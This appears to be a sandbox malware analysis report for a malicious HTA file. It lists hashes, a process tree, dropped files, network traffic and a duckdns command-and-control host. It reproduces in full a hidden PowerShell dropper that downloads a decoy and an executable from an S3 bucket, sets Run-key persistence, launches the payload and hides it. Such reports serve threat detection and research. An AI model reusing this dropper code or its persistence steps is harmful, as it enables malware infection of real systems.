Field | Value
---|---
Download | MSHTAPayloadawalobina.hta
Full analysis | https://app.any.run/tasks/3ded9aa6-72fb-42bb-9dcb-6313dc3359fa
Verdict | Malicious activity
Analysis date | January 10, 2019, 19:41:59
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags | 
Indicators | 
MIME | text/html
File info | HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5 | 966AB78B142D9AAED55E86E26AD73887
SHA1 | 4453F3838CE737F8E7B62545A1A970F21C4A397E
SHA256 | 3486A83F7060F11655B744238DE048E7D9F6E9F41E73FC0635CEF356DB12BE31
SSDEEP | 96:wBvaY1zUMd6VfRjF/Vaqk8k236yOXOuJWksRRzMo:wb1zUrbfaIk+pU6xRRzP
File type | .html: HyperText Markup Language (100)
ContentType | text/html; charset=utf-8
PID | CMD | Path | Indicators | Parent process | Details
---|---|---|---|---|---
3000 | "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\admin\AppData\Local\Temp\MSHTAPayloadawalobina.hta.html | C:\Program Files\Internet Explorer\iexplore.exe | | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Internet Explorer; Exit code: 1; Version: 8.00.7600.16385 (win7_rtm.090713-1255)
3440 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3000 CREDAT:79873 | C:\Program Files\Internet Explorer\iexplore.exe | — | iexplore.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Internet Explorer; Exit code: 0; Version: 8.00.7600.16385 (win7_rtm.090713-1255)
3716 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -WindowStyle hidden -nologo (inline script; the full command line is reproduced below the table) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | iexplore.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
2984 | C:\Windows\system32\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503} | C:\Windows\system32\DllHost.exe | — | svchost.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: COM Surrogate; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
2632 | "C:\Users\admin\AppData\Roaming\WfFyPbj.exe" | C:\Users\admin\AppData\Roaming\WfFyPbj.exe | | powershell.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0
3132 | "C:\Windows\system32\attrib.exe" +h +s C:\Users\admin\AppData\Roaming\WfFyPbj.exe | C:\Windows\system32\attrib.exe | — | powershell.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Attribute Utility; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3768 | "C:\Users\admin\AppData\Local\Temp\88465914\lwh.exe" fld=ktl | C:\Users\admin\AppData\Local\Temp\88465914\lwh.exe | — | WfFyPbj.exe | User: admin; Company: AutoIt Team; Integrity Level: MEDIUM; Description: AutoIt v3 Script; Exit code: 0; Version: 3, 3, 14, 5
2736 | C:\Users\admin\AppData\Local\Temp\88465914\lwh.exe C:\Users\admin\AppData\Local\Temp\88465914\VTOCI | C:\Users\admin\AppData\Local\Temp\88465914\lwh.exe | | lwh.exe | User: admin; Company: AutoIt Team; Integrity Level: MEDIUM; Description: AutoIt v3 Script; Exit code: 0; Version: 3, 3, 14, 5
1144 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | | lwh.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft .NET Services Installation Utility; Version: 4.6.1055.0 built by: NETFXREL2

Full command line of PID 3716 as captured by the sandbox (the inline script downloads a decoy image and an executable from the same S3 bucket, registers the executable under the HKCU Run key, launches it, and then hides the file with attrib +h +s):

```powershell
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -WindowStyle hidden -nologo $osCheckMajor = [System.Environment]::OSVersion.Version | Select -Expand Major;$osCheckMinor = [System.Environment]::OSVersion.Version | Select -Expand Minor;$osVersion = "$osCheckMajor" + '.' + "$osCheckMinor";$poshVersion = $PSVersionTable.PSVersion.Major;if($poshVersion -eq 2){$randomInt = Get-Random -Minimum 5 -Maximum 10;$randomStr = -join ((65..90) + (97..122) | Get-Random -Count $randomInt | % {[char]$_});$peName = $randomStr + '.exe';$savePath = "$env:APPDATA" + '\' + "$peName";$decoyName = "$randomStr" + '.jpg';$decoyURL = 'https://s3-ap-southeast-1.amazonaws.com/bnmmj/guru.jpg';$decoyPath = "$env:APPDATA" + '\' + "$decoyName";$webClient = New-Object System.Net.WebClient;$webDownload = $webClient.DownloadFile($decoyURL, $decoyPath);Start-Process $decoyPath;Start-Sleep -s 7;New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RUN" -Name $randomStr -Value $savePath -Force;;$peDirectURL = 'https://s3-ap-southeast-1.amazonaws.com/bnmmj/awaobinna.exe';$webClient = New-Object System.Net.WebClient;$webDownload = $webClient.DownloadFile($peDirectURL, $savePath)}elseif($poshVersion -ge 3){$randomInt = Get-Random -Minimum 5 -Maximum 10;$randomStr = -join ((65..90) + (97..122) | Get-Random -Count $randomInt | % {[char]$_});$peName = $randomStr + '.exe';$savePath = "$env:APPDATA" + '\' + "$peName";$decoyName = "$randomStr" + '.jpg';$decoyURL = 'https://s3-ap-southeast-1.amazonaws.com/bnmmj/guru.jpg';$decoyPath = "$env:APPDATA" + '\' + "$decoyName";Invoke-WebRequest -Uri $decoyURL -OutFile $decoyPath;Start-Process $decoyPath;Start-Sleep -s 7;New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RUN" -Name $randomStr -Value $savePath -Force;;$peDirectURL = 'https://s3-ap-southeast-1.amazonaws.com/bnmmj/awaobinna.exe';Invoke-WebRequest -Uri $peDirectURL -OutFile $savePath};Start-Process $savePath;attrib +h +s $savePath;""
```
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
3000 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\favicon[1].ico | — | — | —
3000 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | — | —
3716 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\84U14WF1C1GOHJU9ZFQS.temp | — | — | —
2632 | WfFyPbj.exe | C:\Users\admin\AppData\Local\Temp\88465914\ibw.mp4 | text | 7CBA224E33403861F74573F8464D3D2F | AD912169922C0F25F333CF4235429B63C567E349080A4CB6C78F2F49F8279F7E
3716 | powershell.exe | C:\Users\admin\AppData\Roaming\WfFyPbj.jpg | image | 38C3261D8E98A3BBBCFAFF8C259A9DDE | 98F6E62ABC7A08FF41584696CF46DA99C86C3EEF95D1CF3BF6262054E71E4E74
2632 | WfFyPbj.exe | C:\Users\admin\AppData\Local\Temp\88465914\idn.docx | text | B0341DF38A4783109002AB4CF33C9D55 | C2073FFEBE269E494A467760438C9F2A34C109584965555E4A5FFE2FEBEB4858
3440 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012019011020190111\index.dat | dat | CBA4D69DFFAFA00DB6B321A46491D5EF | AC378E39A16B3E8A1B83485D3563C690EF744D9C2B3428FD3D187BF15E561A97
2632 | WfFyPbj.exe | C:\Users\admin\AppData\Local\Temp\88465914\jxn.txt | text | 11D8800A15EBDB99487EDEBC06EF86E8 | 7E63EF6F2A78B51AD2915D0CA50D0B0D0420600BA8F4A99EE6CDAE3AC7868A99
2632 | WfFyPbj.exe | C:\Users\admin\AppData\Local\Temp\88465914\emu.mp3 | text | 5709F32A91FE4FD8DB720BCABD3546D1 | C9992EB858B214114AEF5F2BDFAE725920E4550A4B8E77301144D9363E3F9760
2632 | WfFyPbj.exe | C:\Users\admin\AppData\Local\Temp\88465914\dwa.icm | text | 3A5452C2AF12FB5F972F8FF46C91888C | CB857B22E73625770E18EC4029DA260E7F99F4738E847B16B5EAA56D294F687B
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3000 | iexplore.exe | GET | 200 | 13.107.21.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3000 | iexplore.exe | 13.107.21.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
3716 | powershell.exe | 52.219.32.73:443 | s3-ap-southeast-1.amazonaws.com | Amazon.com, Inc. | SG | unknown |
1144 | RegSvcs.exe | 45.249.90.124:1609 | idea1com2002.duckdns.org | Korea Telecom | KR | malicious |
Domain | IP | Reputation
---|---|---
www.bing.com | | whitelisted
s3-ap-southeast-1.amazonaws.com | | shared
idea1com2002.duckdns.org | | malicious
dns.msftncsi.com | | shared
PID | Process | Class | Message |
---|---|---|---|
— | — | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |
— | — | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |
— | — | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |
— | — | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |